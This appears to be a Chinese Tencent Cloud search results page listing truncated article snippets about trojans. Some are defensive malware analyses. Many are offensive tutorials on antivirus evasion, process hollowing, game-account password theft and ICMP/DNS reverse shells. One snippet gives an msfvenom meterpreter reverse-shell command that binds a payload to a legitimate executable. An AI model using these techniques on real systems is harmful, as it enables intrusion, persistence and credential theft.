- 综合排序
- 最热优先
- 最新优先
- 来自专栏FreeBuf
技术讨论 | Windows 10进程镂空技术(木马免杀)
前言 在Win10 x64环境下替换正常的进程,是一个比较高超的技术。使用该技术,可以内存执行病毒、木马。在文件层面实现免杀。可以把一个木马使用DES加密,放在资源里。 环境 VisualStudio 2015 企业版 普通程序 Notepad.exe (C:\windows\system32\Notepad.exe) 木马程序 MalWare.exe 源码下载地址, Win10平台测试 将ProcessReplacement.exe拖入虚拟机。 ? 双击,提示 ? 看样子是缺少什么文件? 总结 本文介绍的Win10 x64进程镂空技术,可以在文件层面实现木马免杀。 *本文作者:河马安全网,转载请注明来自FreeBuf.COM
2.4K10发布于 2018-07-30 - 来自专栏全栈程序员必看
trojangeneric木马_kali木马绑定app
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
2K40编辑于 2022-11-08 - 来自专栏用户10781703的专栏
浅谈木马
环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。 制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。 (2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。 三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。 木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。
1.6K20编辑于 2023-10-10 - 来自专栏FreeBuf
Kronos银行木马被发现,疑似新版Osiris木马
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。
1.6K50发布于 2018-07-31 - 来自专栏白安全组
挖矿木马详解
一分钟了解什么是挖矿木马 什么是挖矿木马? 挖矿木马自查 挖矿木马自查 发现挖矿 CPU使用率 通常对挖矿木马的感知,主要表现在主机的使用感上,在主机正常运行的情况下,突然变得卡顿,并且CPU的使用率高于正常使用时的数值或达到了100%: 感知产品 当然,仅从卡顿和CPU使用率来判断是否中了挖矿木马是不准确的,从安全产品上能够更加准确直观的发现挖矿木马。 ,即主机请求了“驱动人生”挖矿木马的相关域名。 网页挖矿 网页挖矿是指攻击者将挖矿木马植入正常网站,只要访问者通过浏览器浏览被恶意植入了网页挖矿木马站点,浏览器会即刻执行挖矿指令。
13.5K61发布于 2019-12-02 - 来自专栏黑客技术家园
木马盗号《一》
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 观察到每次打开WeGame时,我输入1234567890,然后我捕获的密码是7321460895(每次重新登陆都不一样),发现个数还是10个,只是被打乱了。 一开始我是通过SendMessage模拟按键消息的,发送1234567890这10个WM_CHAR消息给密码控件,希望得到通过他加密以后的WM_CHAR,但是我抓到的还是1234567890,可是我通过键盘按键得到的还是加密的密码 对于密码,我们需要首先通过驱动(自己写的)模拟按键点击(本次实验为了方便只模拟1234567890共10个数字,字母同理),获得翻译用的密码本,然后再通过钩子直接捕获未解密的密码即可,然后就可以通过密码本破解未解密的密码了
1.9K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《二》
看完了第一篇 WeGame盗号木马之旅(一) ,相信读者已经大概明白了我们需要干什么。 四、编写具体的病毒EXE,实现感染目标EXE并注入我们编写的木马代码。 因为WIN7 64 和WIN 10 都有驱动签名保护,调试起来不是很方便。另外说一句,本次驱动WIN 10系统下好像模拟失败,具体原因我没有时间找。
2K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《三》
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。 /blog.csdn.net/aidem_brown/article/details/50625482)这两个函数地址,然后就可以获取任何模块导出表(https://blog.csdn.net/evi10r locationNum=10) 然后我们就可以在汇编里面通过这两个函数获取我们需要使用函数的地址了。 30h mov eax,0CCCCCCCCh rep stos dword ptr es:[edi] mov eax,dword ptr [ebp+0x10 0 call dword ptr [0X004F1000+0X390];//CreateThread mov eax,dword ptr [ebp+0x10
2K20发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《四》
目标: 实现服务端的代码编写,用于接受木马发回的消息。 实现: 由于这一篇实现任务比较简单,我就讲一下密码的消息接收,账号类似。 由于为了方便我们只模拟10个数字,所以一共20个字符(加上对应的BackSpace,因为不想让用户看出为何密码框平白无故多出10字符,所以我们需要删除)。 , &iSocketLen); int iRec = recv(clientSocket, &cBuffer[index], 1, 0);//接受数据 if (num < 20) {//20是因为10 个字符和10和Backspace if ((int)cBuffer[index] == 8&&index>0) {//不接受BackSpace cBuffer[index] = 0; } else
1K40发布于 2021-04-02 - 来自专栏FreeBuf
来自云端的木马:“百家”木马集团分析
0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的木马,该木马会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能查杀该病毒,多个木马的变种MD5被多款安全软件加入到白名单中 该木马近期持续活跃,传播量上万,该木马有以下特点: 1)通过文件名控制自身行为,根据不同的文件名有着多达六十多种不同的行为。 3)篡改本地受信任数字证书列表,并构造证书给木马签名,逃避查杀。 ? 0×01木马文件概况 ? ,当然PlayLoad中还包含有少量的QQ粘虫木马(如ID 46),及其他游戏盗号木马。 0×03后记: 经过对木马加载器的详细分析和配置信息的猜测解读,做出如下图猜测,木马作者负责木马的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号
1.7K70发布于 2018-02-08 - 来自专栏七夜安全博客
教你学木马攻防 | 隧道木马 | ICMP反弹shell
前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。 在win10上,ping www.baidu.com: ? 我比较关注的是icmp的数据区,这块区域较大,能干很多事情。 win10 ping默认发送的数据是abcdefghijklmnopqrstuvwabcdefghi,共32bytes,而且ICMP响应包数据区的内容和它是一致的,这就是ping的特点,请求什么,响应什么 第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)
4.4K30发布于 2019-03-19 - 来自专栏全栈程序员必看
远程控制木马原理_安卓远程控制木马
导读: 刘东发(http://www.codelive.net)的杰作——–远程控制木马”偷窥者”VC6.0编译通过。2001年是中国的木马大丰收的一年. 这是一款VC++编写的木马,同时是世界上第一款结束杀毒软件进程(金山毒霸)的木马。这是木马发展史上的一个里程碑。之后许多木马/病毒都增加了这一功能。不过,它也不是开放源代码的。 .增加了几种压缩算法,如:LZW(推荐使用)、LZSS、LZ77等. 2.修正了1.2版本中的图像传送的BUG. 3.对服务器端部分功能进行了完善. 2001/10 /31 : 偷窥者 Ver1.2(发行版),包括客户端和服务端,无源程序. 1.增加了存储和读取配置的功能. 2.修改图像压缩算法的BUG. 2001/10/ /23 : 偷窥者 Ver1.0(发行版),包括客户端和服务端,无源程序. 1.改变了客户端为多文档窗口方式,方便了管理. 2.美化的菜单界面. 2001/10/
2.4K20编辑于 2022-11-15 - 来自专栏全栈程序员必看
木马免杀方式_木马入侵的常见方法
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。 免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。 1、裸奔马的尝试 意为不做任何免杀处理的木马 1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧 命令: msfvenom -p windows/meterpreter 使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。 .exe的合成马,同时对木马进行x86/shikata_ga_nai进行多次编码的方式进行免杀处理。
2.4K40编辑于 2022-09-25 - 来自专栏七夜安全博客
教你学木马攻防 | 隧道木马 | DNS反弹shell
DNS反弹shell 在上一篇文章中,我们讲解了木马通信协议中的ICMP协议,并通过ICMP实现了一个反弹shell,本篇接着讲解一下DNS隧道,也实现一个反弹shell。 ?
4.2K30发布于 2019-04-28 - 来自专栏FreeBuf
Ghimob银行木马分析
Guildma是Tétrade银行木马家族中的一员,它活动频繁并处于持续开发状态。 当攻击者进行交易时,木马会利用WebView覆盖主屏幕或全屏打开某个网站,在用户查看屏幕时,攻击者会在后台使用金融应用程序执行交易。 3aa0cb27d4cbada2effb525f2ee0e61e 3e6c5e42c0e06e6eaa03d3d890651619 4a7e75a8196622b340bedcfeefb34fff 4b3743373a10dad3c14ef107f80487c0
1.2K30发布于 2020-12-08 - 来自专栏kayden
基于github的木马
---- 基于github的木马 前言 《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。 return str(files) 一个environment.py获取木马所在远程机器上的所有环境变量 #! [ { "module":"dirlister" }, { "module":"environment" } ] 同样推送 4、编写基于github通信的木马 该木马从github branch = connect_to_github() remote_path = "chapter7/data/%s/%d.data" % (trojan_id, random.randint(10,10000000 module_runner, args=(task['module'],)) t.start() time.sleep(random.randint(1,10
98310编辑于 2022-09-29 - 来自专栏白安全组
木马基础伪装学习
第一个里面选择一个正常的exe程序,然后第二个选择我们的木马文件,最后会生成出带有签名的exe文件,当然这个签名并不是真的,只是有真实签名的内容,但是本质不守承认,有部分杀软不会检测签名详细情况。 LdpcduPV4OOXfY2mppIQDxhdusa-qFG8sNfUCMIH6zNZI0M9L9Wuj46ROqd7soWDLinqUepIo2Z63YIaBvjuC2R7MeLBla8MhVNOIMn742RgMQh0ApZ2SJ5kIyYHpPhgcW5zu7R1-j5aenV2paLGFv5Z3lZM7KY 首先我们将木马文件拖入进去 ,然后再拖入360程序,很简单,我们只需要将360下面的所有文件夹拖到上面的木马中,然后右击上面木马文件另存为即可,之后木马文件所有表面信息都是360的 运行之后也是显示360,这样我们就完成了肉眼的伪装
22200编辑于 2025-06-16 - 来自专栏网络安全与可视化
如何检测Qakbot木马
首先需要了解如下内容 Qakbot:一个活跃的银行木马 Cobalt Strike:一款商业渗透测试工具,不幸的是,Cobalt Strike的盗版已经被泄露。 一个普通用户可能拥有5或10个不同的电子邮件帐户,导致10+ SMTP流,但是152个SMTP连接看起来不正常。 现在,让我们检查由ntopng生成的警报。 image.png 虽然被列入黑名单的JA3并不是Qakbot,但我们刚刚发现,这台主机感染了Gozi银行木马。 结论 即使是用于分析记录的网络流量,ntopng还是帮助您大致了解网络情况的好方法。
1.3K30发布于 2021-04-08 - 来自专栏Cyber Security
文件关联型木马
也就是对某种文件类型(区分于文件拓展名)默认打开方式 使用文件关联实现木马自启动进行权限维持 将木马与某一种类型的文件或程序关联在一起,当打开文件或程序被运行是,木马也悄悄伴随着运行 msfvenom实现绑定程序 windows/meterpreter_reverse_tcp LHOST={公网IP} LPORT={公网端口} -f exe -o payload -i 5 -x {捆绑对象}.exe 修改注册表 执行木马的同时执行文件
27210编辑于 2024-07-18 - 来自专栏FreeBuf
Android木马分析简介
要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android恶意软件有个大概了解。 onBoot在启动的时候就会进行闹铃,SmsReceiver和alarmReceiver则是真正的木马,在任何一个短信到达的时候SmsReceiver会检查里面是否包含有”bank”,如果是则使用abortBroadcast
1.8K90发布于 2018-02-02
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号